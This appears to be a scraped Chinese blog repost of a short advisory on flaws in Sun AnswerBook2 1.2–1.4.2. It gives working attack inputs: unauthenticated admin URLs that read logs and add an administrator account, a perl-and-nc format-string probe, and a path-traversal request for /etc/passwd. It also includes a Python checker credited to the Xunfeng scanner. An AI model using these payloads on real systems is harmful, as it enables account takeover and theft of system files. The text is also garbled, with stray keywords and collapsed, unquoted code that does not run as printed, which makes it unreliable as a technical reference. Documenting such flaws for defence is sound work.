1. 程式人生 > >Sun公司的產品AnswerBook存在多種漏洞

Sun公司的產品AnswerBook存在多種漏洞

lose ont viewer load file pro ans spa inf

一、未授權管理腳本訪問漏洞:

1、受影響版本:

Sun-AnswerBook2 1.2-1.4.2

2、攻擊測試手段

http://a.b.c.d:8888/ab2/@AdminViewError#訪問錯誤日誌

http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加賬戶(密碼)

二、遠程格式化字符串漏洞

1、受影響版本:

Sun-AnswerBook2 1.2-1.4.2

2、攻擊測試手段:

1 perl -e print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"
| nc localhost 8888

應該可以看到如下報錯:

http-8888 [23/Sep/2000:13:09:37 -0700] warning: send-file reports: The
requested object "/usr/lib/ab2/data/docs/0fea19f580073656e642d66696c6520
7265706f7274733a2054686520726571756573746564206f626a65637420222f7573722f6
c69622f6162322f646174612f646f63732f" could not be opened!

任意文件讀取(有些HTTP-Proxy也有這個漏洞):

直接連接connect漏洞主機的對應的端口()

發送Payload

1 GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n

就可以得到對應的文件內容

技術分享圖片

參考巡風的POC:

 1 def check(ip, port, timeout):
 2     try:
 3         socket.setdefaulttimeout(timeout)
 4         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 5         s.connect((ip, int(port)))
6 flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n" 7 s.send(flag) 8 data = s.recv(1024) 9 s.close() 10 if root: in data and nobody: in data: 11 return u"漏洞" 12 except: 13 pass

Sun公司的產品AnswerBook存在多種漏洞